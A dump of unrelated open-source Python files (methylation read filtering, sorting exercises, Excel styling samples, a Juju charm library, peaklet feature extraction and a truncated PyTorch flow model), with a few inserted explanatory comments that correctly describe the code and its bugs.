select_rna_reads_normal(input_bam,\n output_bam,\n mc_rate_min_threshold=0.9,\n cov_min_threshold=3,\n nome=False):\n read_profile_dict = defaultdict(int)\n with pysam.AlignmentFile(input_bam) as bam:\n with pysam.AlignmentFile(output_bam, header=bam.header,\n mode='wb') as out_bam:\n for read in bam:\n read_mch_rate, cov, other_snp = single_read_mch_level(read, nome=nome)\n read_profile_dict[(int(100 * read_mch_rate), cov)] += 1\n\n # split reads\n if (read_mch_rate <\n mc_rate_min_threshold) or (cov < cov_min_threshold):\n continue\n out_bam.write(read)\n\n with open(str(output_bam) + '.reads_profile.csv', 'w') as stat_f:\n stat_f.write('mc_frac,cov,count\\n')\n for (mc_rate, cov), count in read_profile_dict.items():\n stat_f.write(f'{mc_rate},{cov},{count}\\n')\n return\n\n\ndef select_rna_reads_split_reads(input_bam,\n output_bam,\n mc_rate_min_threshold=0.9,\n cov_min_threshold=3,\n nome=False):\n splited_read_name_pattern = re.compile('.+-[lrm]$')\n\n # first pass: determine read methylation level\n read_level_mcs = defaultdict(int)\n read_level_covs = defaultdict(int)\n with pysam.AlignmentFile(input_bam) as f:\n for read in f:\n mc, cov, other_snp = single_read_mch_level(read, frac=True, nome=nome)\n read_name = read.qname\n if splited_read_name_pattern.search(read_name):\n read_level_mcs[read_name[:-2]] += mc\n read_level_covs[read_name[:-2]] += cov\n else:\n 
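# ---- editor's note: the forward-strand bookkeeping in single_read_mch_level
# ---- above, reduced to plain strings (no pysam needed): within an allowed
# ---- CH context, reference G read as G is methylated (unconverted), G read
# ---- as A is converted, and any other mismatch counts as a SNP. This
# ---- mirrors the module's constants; the reverse strand is symmetric.
FORWARD_READ_MCH_CONTEXT = {'AG', 'TG', 'GG'}

def classify_forward(ref_context, ref_base, read_base):
    if ref_context not in FORWARD_READ_MCH_CONTEXT:
        return 'skip'           # not a CH cytosine on this strand
    pair = ref_base + read_base
    if pair == 'GG':
        return 'methylated'     # unconverted
    if pair == 'GA':
        return 'unmethylated'   # bisulfite-converted
    return 'snp'                # other mismatch, excluded from coverage

print(classify_forward('TG', 'G', 'G'))  # methylated
print(classify_forward('TG', 'G', 'A'))  # unmethylated
print(classify_forward('CG', 'G', 'G'))  # skip (CpG context, not CH)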
read_level_mcs[read_name] += mc\n read_level_covs[read_name] += cov\n read_level_data = pd.DataFrame({\n 'mc': read_level_mcs,\n 'cov': read_level_covs\n })\n read_level_data['mc_frac'] = read_level_data['mc'] / (read_level_data['cov'] +\n 0.001)\n read_level_data['mc_frac'] = (read_level_data['mc_frac'] * 100).astype(int)\n profile = read_level_data.groupby('mc_frac')['cov'].value_counts()\n profile.name = 'count'\n profile = profile.reset_index()\n profile.to_csv(f'{output_bam}.reads_profile.csv', index=None)\n\n # filter reads\n use_reads = read_level_data[\n (read_level_data['mc_frac'] > mc_rate_min_threshold)\n & (read_level_data['cov'] >= cov_min_threshold)].index.tolist()\n use_reads = set(use_reads)\n del read_level_data\n\n # second pass: write passed reads\n with pysam.AlignmentFile(input_bam) as f:\n with pysam.AlignmentFile(output_bam, header=f.header,\n mode='wb') as out_f:\n for read in f:\n read_name = read.qname\n if (read_name in use_reads) or (read_name[:-2] in use_reads):\n # read name or read name without suffix\n out_f.write(read)\n return\n\n\ndef select_rna_reads(input_bam,\n output_bam,\n mc_rate_min_threshold=0.5,\n cov_min_threshold=3,\n nome=False,\n assay_type='mc'):\n if assay_type == 'mc':\n select_rna_reads_normal(input_bam,\n output_bam,\n mc_rate_min_threshold=mc_rate_min_threshold,\n cov_min_threshold=cov_min_threshold,\n nome=nome)\n elif assay_type == 'm3c':\n select_rna_reads_split_reads(input_bam,\n output_bam,\n mc_rate_min_threshold=mc_rate_min_threshold,\n cov_min_threshold=cov_min_threshold,\n nome=nome)\n else:\n raise ValueError(f'Unknown assay_type {assay_type}.')\n return\n","repo_name":"lhqing/cemba_data","sub_path":"cemba_data/mapping/mct/mct_star_bam_filter.py","file_name":"mct_star_bam_filter.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"34"} +{"seq_id":"42182412524","text":"\"\"\"Utilities to run GHub\"\"\"\nfrom .ghubutils import Context, GHub\nfrom .cliutils import Interpreter\nfrom termcolor import colored\nimport colorama\n\nimport os\n\n\ndef run_ghub():\n \"\"\"Run GHub\"\"\"\n colorama.init()\n print(\"Welcome to GHub - Browse GitHub like it is UNIX\")\n print(\"Starting initial setup...\")\n ghub = GHub()\n interpreter = Interpreter()\n print(\"Setup done.\")\n while True:\n print(\n \"ghub:{} {}>\".format(\n colored(ghub.context.context, \"yellow\"),\n colored(ghub.context.location, \"green\"),\n ),\n end=\" \",\n )\n command = input()\n interpreter.execute(command, ghub)\n","repo_name":"anuravi98/ghub","sub_path":"ghub/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11803798675","text":"#! usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nInsertion\n\nThe algorithm that people often use to sort bridge hands is to consider the\ncards one at a time, inserting each into its proper place among those already\nconsidered (keeping them sorted). 
In a computer implementation, we need to make\nspace for the current item by moving larger items one position to the right,\nbefore inserting the current item into the vacated position.\n\nAverage case performance О(n^2)\n\n插入排序\n通常人们整理桥牌的方法是一张一张的来,将每一张牌插入到其他已经有序的牌中的适当位置。在计算机的实\n现中,为了给更小的元素腾出空间,我们需要将其余所有元素在插入之前都向右移动一位。\n\n时间复杂度 O(n^2)\n\"\"\"\n\ndef insertion(array):\n if len(array) == 1:\n return array\n\n for i in range(1, len(array)):\n insertion = array[i]\n j = i\n\n # check the right position to insert forwardly and move the position of\n # larger item\n while j > 0 and insertion < array[j-1]:\n array[j] = array[j-1]\n j -= 1\n\n # insert the right position\n array[j] = insertion\n\n return array\n\nif __name__ == \"__main__\":\n\n import sys\n sys.path.append('../')\n from generator import *\n\n data = getRandomNumbers(0, 1000, 15)\n print('Insertion Sort')\n print('> input: %s' % data)\n print('> output: %s' % insertion(data))\n","repo_name":"StevenYuysy/algorithms","sub_path":"chapter-2/Insertion.py","file_name":"Insertion.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"16221322144","text":"\"\"\"\n pip install pyexcelerate\n\"\"\"\n\nfrom pyexcelerate import Workbook\nfrom datetime import datetime\n\n\ndef write_bulk_data_cell_by_cell():\n data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] # data is a 2D array\n wb = Workbook()\n wb.new_sheet(\"sheet name\", data=data)\n wb.save(\"write_bulk_data_cell_by_cell.xlsx\")\n\n\ndef write_bulk_data_to_a_range():\n wb = Workbook()\n ws = wb.new_sheet(\"test\")\n ws.range(\"B2\", \"C3\").value = [[1, 2], [3, 4]]\n wb.save(\"write_bulk_data_to_a_range.xlsx\")\n\n\ndef write_cell_data_faster():\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.set_cell_value(1, 1, 15) # a number\n ws.set_cell_value(1, 2, 20)\n ws.set_cell_value(1, 3, \"=SUM(A1,B1)\") # a formula\n ws.set_cell_value(1, 4, str(datetime.now())) # a date\n wb.save(\"write_cell_data_faster.xlsx\")\n\n\ndef write_cell_data_fast():\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 15 # a number\n ws[1][2].value = 20\n ws[1][3].value = \"=SUM(A1,B1)\" # a formula\n ws[1][4].value = str(datetime.now()) # a date\n wb.save(\"write_cell_data_fast.xlsx\")\n\n\ndef select_cell_by_name():\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.cell(\"A1\").value = 12\n wb.save(\"select_cell_by_name.xlsx\")\n\n\ndef merge_cell():\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n \n ws[1][1].value = 15\n ws.range(\"A1\", \"B1\").merge()\n\n ws[1][5].value = 15\n ws.range(\"E1\", \"G1\").merge()\n\n ws[3][1].value = 15\n ws.range(\"A3\", \"A4\").merge()\n\n ws[3][5].value = 15\n ws.range(\"E3\", \"E5\").merge()\n\n wb.save(\"merge_cell.xlsx\")\n\n\ndef styling_cell_fastest():\n from pyexcelerate import Workbook, Color, Style, Font, Fill, Format\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.set_cell_value(1, 1, 123456)\n ws.set_cell_style(1, 1, Style(font=Font(bold=True)))\n ws.set_cell_style(1, 1, Style(font=Font(italic=True)))\n ws.set_cell_style(1, 1, Style(font=Font(underline=True)))\n ws.set_cell_style(1, 1, Style(font=Font(strikethrough=True)))\n ws.set_cell_style(1, 1, Style(fill=Fill(background=Color(255,228,75,52))))\n\n ws.set_cell_value(1, 2, datetime.now())\n ws.set_cell_style(1, 2, Style(format=Format('mm/dd/yy')))\n\n wb.save(\"styling_cell_fastest.xlsx\")\n\n\ndef styling_cell_faster():\n from 
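# ---- editor's note: a quick check of insertion() above without the repo's
# ---- generator module -- larger items shift right until the vacated slot is
# ---- the current item's proper place, so everything left of i stays sorted.
def _insertion(array):
    for i in range(1, len(array)):
        item, j = array[i], i
        while j > 0 and item < array[j - 1]:
            array[j] = array[j - 1]     # shift the larger item right
            j -= 1
        array[j] = item                 # drop into the vacated position
    return array

print(_insertion([5, 2, 4, 6, 1, 3]))   # [1, 2, 3, 4, 5, 6]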
pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.set_cell_value(1, 1, 123456)\n ws.get_cell_style(1, 1).font.bold = True\n ws.get_cell_style(1, 1).font.italic = True\n ws.get_cell_style(1, 1).font.underline = True\n ws.get_cell_style(1, 1).font.strikethrough = True\n ws.get_cell_style(1, 1).fill.background = Color(0, 255, 0, 0)\n\n ws.set_cell_value(1, 2, datetime.now())\n ws.get_cell_style(1, 2).format.format = 'mm/dd/yy'\n \n wb.save(\"styling_cell_faster.xlsx\")\n\n\ndef styling_cell_fast():\n from pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws[1][1].style.font.bold = True\n ws[1][1].style.font.italic = True\n ws[1][1].style.font.underline = True\n ws[1][1].style.font.strikethrough = True\n ws[1][1].style.fill.background = Color(0, 255, 0, 0)\n\n ws[1][2].value = datetime.now()\n ws[1][2].style.format.format = 'mm/dd/yy'\n\n wb.save(\"styling_cell_fast.xlsx\")\n\n\ndef styling_ranges():\n from pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"test\")\n ws.range(\"A1\",\"C3\").value = 1\n ws.range(\"A1\",\"C1\").style.font.bold = True\n ws.range(\"A2\",\"C3\").style.font.italic = True\n ws.range(\"A3\",\"C3\").style.fill.background = Color(255, 0, 0, 0)\n ws.range(\"C1\",\"C3\").style.font.strikethrough = True\n\n wb.save(\"styling_ranges.xlsx\")\n\n\ndef styling_rows_fastest():\n from pyexcelerate import Workbook, Color, Style, Fill\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws.set_row_style(1, Style(fill=Fill(background=Color(255,0,0,0))))\n wb.save(\"styling_rows_fastest.xlsx\")\n\n\ndef styling_rows_faster():\n from pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws.get_row_style(1).fill.background = Color(255, 0, 0)\n wb.save(\"styling_rows_faster.xlsx\")\n\ndef styling_rows_fast():\n from pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws[1].style.fill.background = Color(255, 0, 0)\n wb.save(\"styling_rows_fast.xlsx\")\n\n\ndef styling_columns_fastest():\n from pyexcelerate import Workbook, Color, Style, Fill\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws.set_col_style(1, Style(fill=Fill(background=Color(255,0,0,0))))\n wb.save(\"styling_columns_fastest.xlsx\")\n\n\ndef row_height_width():\n from pyexcelerate import Workbook, Color, Style, Fill\n from datetime import datetime\n\n wb = Workbook()\n\n ws = wb.new_sheet(\"sheet name 1\")\n \n ws[1][1].value = \"this is long string 1\"\n ws[1][2].value = \"this is long string 2\"\n ws[1][3].value = \"this is long string 3\"\n\n ws.set_col_style(1, Style(size=-1)) # auto-fit column 1\n ws.set_col_style(2, Style(size=0)) # hidden column 2\n ws.set_col_style(3, Style(size=100)) # width=100 column 3\n \n # -----------------\n ws = wb.new_sheet(\"sheet name 2\")\n \n ws[1][1].value = \"this is long string 1\"\n ws[2][1].value = \"this is long string 2\"\n ws[3][1].value = \"this is long string 3\"\n\n ws.set_row_style(1, Style(size=-1)) # auto-fit column 1\n ws.set_row_style(2, Style(size=0)) # hidden column 2\n ws.set_row_style(3, Style(size=100)) # 
width=100 column 3\n\n wb.save(\"row_height_width.xlsx\")\n\n\ndef styling_available():\n from pyexcelerate import Workbook, Color, Style, Fill, Border\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws[1][1].style.font.bold = True\n ws[1][1].style.font.italic = True\n ws[1][1].style.font.underline = True\n ws[1][1].style.font.strikethrough = True\n ws[1][1].style.font.color = Color(255, 0, 255)\n ws[1][1].style.fill.background = Color(0, 255, 0)\n ws[1][1].style.alignment.vertical = 'top'\n ws[1][1].style.alignment.horizontal = 'right'\n ws[1][1].style.alignment.rotation = 90\n ws[1][1].style.alignment.wrap_text = True\n ws[1][1].style.borders.top.color = Color(255, 0, 0)\n ws[1][1].style.borders.right.style = '-.' # available: .-, ..-, --, .., =, ., medium -., medium -.., medium --, /-., _\n\n wb.save(\"styling_available.xlsx\")\n\n\ndef styling_defined_by_objects():\n from pyexcelerate import Workbook, Font, Color, Alignment\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = datetime.now()\n\n ws[1][1].style.font = Font(bold=True, italic=True, underline=True, strikethrough=True, family=\"Calibri\", size=10, color=Color(255,0,0))\n ws[1][1].style.format.format = 'mm/dd/yy'\n ws[1][1].style.alignment=Alignment(horizontal=\"left\", vertical=\"bottom\", rotation=0, wrap_text=True) #(\"left\", \"center\", \"right\"), \n\n wb.save(\"styling_defined_by_objects.xlsx\")\n\n\n\ndef styling_defined_ALL_style_by_objects():\n from pyexcelerate import Workbook, Style, Font, Color, Fill, Alignment, Borders, Border, Format\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n \n borders = Borders.Borders(\n left=Border.Border(color=Color(255,0,0), style=\"thin\"), \n right=Border.Border(color=Color(255,0,0), style=\"mediumDashDotDot\"), \n top=Border.Border(color=Color(255,0,0), style=\"double\"), \n bottom=Border.Border(color=Color(255,0,0), style=\"slantDashDot\")\n )\n\n ws.cell(\"E11\").value = datetime.now()\n ws.cell(\"E11\").style = Style(\n font=Font(bold=True, italic=True, underline=True, strikethrough=True, family=\"Calibri\", size=20, color=Color(251,240,11)),\n fill=Fill(background= Color(33,133,255)), \n alignment=Alignment(horizontal=\"left\", vertical=\"bottom\", rotation=0, wrap_text=True), #(\"left\", \"center\", \"right\"), \n borders=borders,\n format=Format('mm/dd/yy'), # NOTE: if cell string show ###, then decrease font size or increase col size\n # size=-1 # NOTE: don't work, it must use below with row or column statements\n )\n\n ws.set_col_style(5, Style(size=-1)) # set width of column # E col\n ws.set_row_style(11, Style(size=-1)) # set height of row\n\n wb.save(\"styling_defined_ALL_style_by_objects.xlsx\")\n\n\ndef styling_cell_some_sample_format():\n from pyexcelerate import Workbook, Style\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.set_col_style(5, Style(size=30)) # set width of column # E col\n \n ws.cell(\"E1\").value = datetime.now()\n ws.cell(\"E1\").style.format.format = 'mm/dd/yy hh:MM:ss' # datetime\n\n ws.cell(\"E2\").value = 12345678\n ws.cell(\"E2\").style.format.format = '#,##0' # number : 12,345,678\n\n ws.cell(\"E3\").value = 1234.5678\n ws.cell(\"E3\").style.format.format = '#,##0.00' # float number : 1,234.57\n\n ws.cell(\"E4\").value = 0.12345\n ws.cell(\"E4\").style.format.format = '0.00%' # percentage: 12.35%\n\n wb.save(\"styling_cell_some_sample_format.xlsx\")\n\n\nif __name__ == \"__main__\":\n # write_bulk_data_cell_by_cell()\n # 
write_bulk_data_to_a_range()\n # write_cell_data_faster()\n # write_cell_data_fast()\n \n # select_cell_by_name()\n # merge_cell()\n\n # styling_cell_fastest()\n # styling_cell_faster()\n # styling_cell_fast()\n styling_cell_some_sample_format()\n\n # styling_ranges()\n\n # styling_rows_fastest()\n # styling_rows_faster()\n # styling_rows_fast()\n\n # styling_columns_fastest()\n\n # styling_available()\n # row_height_width()\n\n # styling_defined_by_objects()\n # styling_defined_ALL_style_by_objects()\n","repo_name":"PhungXuanAnh/python-note","sub_path":"pyexcelerate_sample/pyexcelerate_sample.py","file_name":"pyexcelerate_sample.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"43159458310","text":"\"\"\"TODO: Add a proper docstring here.\n\nThis is a placeholder docstring for this charm library. Docstrings are\npresented on Charmhub and updated whenever you push a new version of the\nlibrary.\n\nComplete documentation about creating and documenting libraries can be found\nin the SDK docs at https://juju.is/docs/sdk/libraries.\n\nSee `charmcraft publish-lib` and `charmcraft fetch-lib` for details of how to\nshare and consume charm libraries. They serve to enhance collaboration\nbetween charmers. Use a charmer's libraries for classes that handle\nintegration with their charm.\n\nBear in mind that new revisions of the different major API versions (v0, v1,\nv2 etc) are maintained independently. You can continue to update v0 and v1\nafter you have pushed v3.\n\nMarkdown is supported, following the CommonMark specification.\n\"\"\"\n\nfrom ops.framework import BoundEvent, EventBase, EventSource, Object, ObjectEvents\nfrom ops.charm import CharmBase\n\nimport logging\n\nLIBID = \"45208406413c4910a95babe7910a6ff9\"\nLIBAPI = 0\nLIBPATCH = 1\n\nDEFAULT_RELATION_NAME = \"dashboard-info\"\n\nlogger = logging.getLogger(__name__)\n\nclass DashboardEntry:\n name: str\n url: str\n icon: str\n\nclass DashboardInfoProvider(Object):\n\n def __init__(\n self, \n charm,\n relation_name: str = DEFAULT_RELATION_NAME, \n entry: DashboardEntry = None\n ):\n super().__init__(charm, relation_name)\n self._charm = charm\n self._relation_name = relation_name\n self._entry = entry\n\n events = self._charm.on[self._relation_name]\n self.framework.observe(events.relation_joined, self._on_relation_changed)\n\n def _on_relation_changed(self, event):\n if not self._charm.unit.is_leader():\n return\n \n if not self._entry:\n return\n \n for relation in self._charm.model.relations[self._relation_name]:\n relation.data[relation.app][\"name\"] = self._entry.name\n relation.data[relation.app][\"url\"] = self.unit_address\n relation.data[relation.app][\"icon\"] = self._entry.icon\n\n @property\n def unit_address(self):\n if self._entry.url:\n return self._entry.url\n \n unit_ip = str(self._charm.model.get_binding(relation).network.bind_address)\n if self._is_valid_unit_address(unit_ip):\n return unit_ip\n \n return socket.getfqdn()\n\n\n\n\nclass EntriesChangedEvent(EventBase):\n \"\"\"Event emitted when dashboard entries change.\"\"\"\n\n def __init__(self, handle, apps):\n super().__init__(handle)\n self.apps = apps\n\n def snapshot(self):\n \"\"\"Save dashboard entries information.\"\"\"\n return {\"apps\": self.apps}\n\n def restore(self, snapshot):\n \"\"\"Restore dashboard entries information.\"\"\"\n self.apps = snapshot[\"apps\"]\n\n\nclass DashboardInfoEvents(ObjectEvents):\n \"\"\"Events raised by 
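# ---- editor's note (comments only; the fix is framework-bound): as written,
# ---- DashboardInfoProvider.unit_address above cannot take its fallback
# ---- branches -- `relation` is undefined in the property's scope (NameError),
# ---- `_is_valid_unit_address` is never defined on the class (AttributeError),
# ---- and `socket` is never imported (NameError). It only works while
# ---- self._entry.url is set; the fallbacks need a relation argument, an
# ---- `import socket`, and a validity helper before they can run.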
`DashboardInfoConsumer`\"\"\"\n\n entries_changed = EventSource(EntriesChangedEvent)\n\nclass DashboardInfoConsumer(Object):\n\n on = DashboardInfoEvents()\n\n def __init__(self, charm: CharmBase, relation_name: str = DEFAULT_RELATION_NAME):\n super().__init__(charm, relation_name)\n self._charm = charm\n self._relation_name = relation_name\n events = self._charm.on[self._relation_name]\n self.framework.observe(events.relation_changed, self._on_relation_changed)\n self.framework.observe(events.relation_joined, self._on_relation_changed)\n self.framework.observe(events.relation_departed, self._on_relation_changed)\n self.framework.observe(events.relation_broken, self._on_relation_changed)\n\n def _on_relation_changed(self, event):\n \n self.on.entries_changed.emit(apps=self.entries)\n\n @property\n def entries(self):\n return [\n {\n \"name\": relation.data[relation.app].get(\"name\", \"\"),\n \"url\": relation.data[relation.app].get(\"url\", \"\"),\n \"icon\": relation.data[relation.app].get(\"icon\", \"\") \n }\n for relation in self._charm.model.relations[self._relation_name]\n ]","repo_name":"simskij/cos-dashboard-k8s-operator","sub_path":"lib/charms/cos_dashboard_k8s/v0/dashboard_info.py","file_name":"dashboard_info.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8494687193","text":"import numpy as np\nimport straxen\n\ndef compute_s1_boundary(parm, area):\n boundary_line = parm[0]*np.exp(-area/parm[1]) + parm[2]\n \n return boundary_line\n\n\ndef data_to_log_decile_log_area_aft(peaklet_data, normalization_factor):\n \"\"\"\n Converts peaklet data into the current best inputs for the SOM, \n log10(deciles) + log10(area) + AFT\n Since we are dealing with logs, anything less than 1 will be set to 1\n \n \"\"\"\n \n # turn deciles into approriate 'normalized' format (maybe also consider L1 normalization of these inputs)\n _,decile_data = compute_wf_and_quantiles(peaklet_data, 10)\n decile_data[decile_data < 1] = 1\n #decile_L1 = np.log10(decile_data)\n decile_log = np.log10(decile_data)\n decile_log_over_max = np.divide(decile_log, normalization_factor[:10])\n \n # Now lets deal with area\n if np.min(peaklet_data['area']) < 0:\n # this might be an issue with the recall function\n # I should also save this value to use\n peaklet_data['area'] = peaklet_data['area']+normalization_factor[11]+1\n elif np.min(peaklet_data['area']) == 1:\n pass # area data is already shifted \n peaklet_log_area = np.log10(peaklet_data['area'])\n \n peaklet_aft = np.sum(peaklet_data['area_per_channel'][:,:straxen.n_top_pmts], axis = 1) / peaklet_data['area']\n peaklet_aft = np.where(peaklet_aft > 0, peaklet_aft, 0)\n peaklet_aft = np.where(peaklet_aft < 1, peaklet_aft, 1)\n \n print(decile_log.shape)\n print((decile_log / normalization_factor[:10]).shape)\n deciles_area_aft = np.concatenate((decile_log_over_max, \n np.reshape(peaklet_log_area, (len(peaklet_log_area),1))/ normalization_factor[10],\n np.reshape(peaklet_aft, (len(peaklet_log_area),1))), axis = 1)\n \n return deciles_area_aft\n\n\ndef compute_wf_and_quantiles(peaks: np.ndarray, bayes_n_nodes: int):\n \"\"\"\n Compute waveforms and quantiles for a given number of nodes(atributes)\n :param peaks:\n :param bayes_n_nodes: number of nodes or atributes\n :return: waveforms and quantiles\n \"\"\"\n waveforms = np.zeros((len(peaks), bayes_n_nodes))\n quantiles = np.zeros((len(peaks), bayes_n_nodes))\n\n num_samples = peaks['data'].shape[1] \n #modified 
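On the consuming side, a charm would typically instantiate `DashboardInfoConsumer` and react to its `entries_changed` event. A minimal sketch under the standard ops entry point; `DashboardCharm` and its handler are illustrative names, not part of this library:

```python
import logging

from ops.charm import CharmBase
from ops.main import main

from charms.cos_dashboard_k8s.v0.dashboard_info import DashboardInfoConsumer

logger = logging.getLogger(__name__)


class DashboardCharm(CharmBase):
    """Hypothetical consumer of the dashboard-info relation."""

    def __init__(self, *args):
        super().__init__(*args)
        self.dashboard_info = DashboardInfoConsumer(self, relation_name="dashboard-info")
        # entries_changed fires on relation joined/changed/departed/broken
        self.framework.observe(
            self.dashboard_info.on.entries_changed, self._on_entries_changed
        )

    def _on_entries_changed(self, event):
        # event.apps is the list of {"name", "url", "icon"} dicts from relation data
        for app in event.apps:
            logger.info("dashboard entry: %s -> %s", app["name"], app["url"])


if __name__ == "__main__":
    main(DashboardCharm)
```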
line, original num_samples = peaks['data'].shape[1] \n    step_size = int(num_samples/bayes_n_nodes)\n    steps = np.arange(0, num_samples+1, step_size)\n\n    data = peaks['data'].copy() #data = peaks['data'].copy() \n    data[data < 0.0] = 0.0\n    for i, p in enumerate(peaks):\n        sample_number = np.arange(0, num_samples+1, 1)*p['dt']\n        frac_of_cumsum = np.append([0.0], np.cumsum(data[i, :]) / np.sum(data[i, :]))\n        cumsum_steps = np.interp(np.linspace(0., 1., bayes_n_nodes, endpoint=False), frac_of_cumsum, sample_number)\n        cumsum_steps = np.append(cumsum_steps, sample_number[-1])\n        quantiles[i, :] = cumsum_steps[1:] - cumsum_steps[:-1]\n\n    for j in range(bayes_n_nodes):\n        waveforms[:, j] = np.sum(data[:, steps[j]:steps[j+1]], axis=1)\n    waveforms = waveforms/(peaks['dt']*step_size)[:, np.newaxis]\n\n    del data\n    return waveforms, quantiles\n\ndef compute_AFT(data):\n    peaklets_aft = np.sum(data['area_per_channel'][:,:straxen.n_top_pmts], axis = 1) / np.sum(data['area_per_channel'], axis = 1) \n    return peaklets_aft","repo_name":"LuisSanchez25/SOM_peaklet_classification_code","sub_path":"Peaklet_cls_functions.py","file_name":"Peaklet_cls_functions.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"11615127455","text":"#sorting\r\n\r\ndef bubble_sort(list):\r\n    length = len(list)\r\n    for i in range(length):\r\n        for j in range(0, length-i-1):\r\n            if list[j] > list[j+1]:\r\n                temp = list[j]\r\n                list[j] = list[j+1]\r\n                list[j+1] = temp\r\n\r\nunsorted = [7,1,3,4,2,4,6,5,5]\r\nprint (\"Original list:\")\r\nfor i in range(len(unsorted)):\r\n    print (\"% d\" % unsorted[i],end=\" \")\r\nprint (\"\\n\")\r\nbubble_sort(unsorted)\r\n\r\nprint (\"Sorted list:\")\r\nfor i in range(len(unsorted)):\r\n    print (\"% d\" % unsorted[i],end=\" \")\r\n\r\n#binary search\r\n\r\ndef binary_search(array, element, start, end):\r\n    if start > end:\r\n        return -1\r\n\r\n    mid = (start + end) // 2\r\n    if element == array[mid]:\r\n        return mid\r\n\r\n    if element < array[mid]:\r\n        return binary_search(array, element, start, mid-1)\r\n    else:\r\n        return binary_search(array, element, mid+1, end)\r\n\r\nprint (\"\\n\")\r\nprint ('Enter the number to search for')\r\nmy_element = int(input())\r\nindex = binary_search(unsorted, my_element, 0, len(unsorted)-1)\r\nmatch = 'MATCH' if index != -1 else 'NOT MATCH'\r\nprint (match)\r\n","repo_name":"chtopor/tz","sub_path":"proj1_bubble_sort.py","file_name":"proj1_bubble_sort.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"13675812711","text":"def count_divisor(n: int) -> int:\n    count = 0\n    for i in range(1, n+1):\n        if n % i == 0:\n            count += 1\n    return count\n\n\ndef main() -> None:\n    n = int(input())\n\n    answer = 0\n    for i in range(1, n+1, 2):\n        if count_divisor(i) == 8:\n            answer += 1\n    print(answer)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"SatoKeiju/AtCoder-Python3","sub_path":"ABC106/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"34043518932","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom . 
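`count_divisor` in the AtCoder sample above tries every candidate up to `n`, which is O(n) per call. Since divisors come in pairs `(i, n // i)`, scanning only up to the integer square root gives the same count; a sketch of that variant:

```python
import math

def count_divisor_fast(n: int) -> int:
    # Each i <= sqrt(n) that divides n contributes the pair (i, n // i);
    # a perfect-square root contributes itself only once.
    count = 0
    for i in range(1, math.isqrt(n) + 1):  # math.isqrt needs Python >= 3.8
        if n % i == 0:
            count += 1 if i == n // i else 2
    return count

assert count_divisor_fast(105) == 8  # divisors: 1, 3, 5, 7, 15, 21, 35, 105
```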
import thops\nfrom utils.util import opt_get\nfrom models.modules.Basic import Conv2d, Conv2dZeros, GaussianDiag, DenseBlock, RRDB, FCN\nfrom models.modules.FlowStep import FlowStep\n\nimport functools\nimport models.modules.module_util as mutil\n\n\nclass ConditionalFlow(nn.Module):\n def __init__(self, num_channels, num_channels_split, n_flow_step=0, opt=None, num_levels_condition=0, SR=True):\n super().__init__()\n self.SR = SR\n\n # number of levels of RRDB features. One level of conditional feature is enough for image rescaling\n num_features_condition = 2 if self.SR else 1\n\n # feature extraction\n RRDB_nb = opt_get(opt, ['RRDB_nb'], [5, 5])\n RRDB_nf = opt_get(opt, ['RRDB_nf'], 64)\n RRDB_gc = opt_get(opt, ['RRDB_gc'], 32)\n RRDB_f = functools.partial(RRDB, nf=RRDB_nf, gc=RRDB_gc)\n self.conv_first = nn.Conv2d(num_channels_split + RRDB_nf*num_features_condition*num_levels_condition, RRDB_nf, 3, 1, 1, bias=True)\n self.RRDB_trunk0 = mutil.make_layer(RRDB_f, RRDB_nb[0])\n self.RRDB_trunk1 = mutil.make_layer(RRDB_f, RRDB_nb[1])\n self.trunk_conv1 = nn.Conv2d(RRDB_nf, RRDB_nf, 3, 1, 1, bias=True)\n\n # conditional flow\n self.additional_flow_steps = nn.ModuleList()\n for k in 